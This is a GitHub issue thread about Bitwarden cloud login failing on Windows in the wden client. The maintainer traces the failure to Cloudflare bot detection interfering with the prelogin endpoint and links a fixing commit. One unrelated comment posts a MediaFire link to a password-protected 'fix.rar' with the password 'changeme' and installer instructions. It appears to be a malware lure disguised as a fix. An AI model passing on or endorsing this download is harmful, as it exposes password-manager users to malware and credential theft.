### ISSUE TITLE
Bitwarden cloud login not working on Windows

### ISSUE THREAD

**Issue by luryus** [luryus/wden#366]
The bot detection is back. Trying to log in on Windows results in an "incorrect username or password" error. Proxying the traffic locally through mitmproxy makes the logins work - this is most likely Cloudflare bot detection once again.

**Comment by wolone** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by luryus** [comment]
It seems that even the `prelogin` endpoint has started misbehaving then bot detection kicks in. Without mitmproxy on Windows, the prelogin returns default values for KDF parameters. Most likely Bitwarden is stripping the email entirely from the request in a Cloudflare middleware or something like that.

Probably the only option now is to actually implement sync with the API keys. The sync response includes the KDF parameters as well, so the vault can be decrypted afterwards with those.

**Comment by luryus** [comment]
Should be fixed now with [2c38a10](https://github.com/luryus/wden/commit/2c38a10ef628675fbdf0db48788659069a3fda1e)
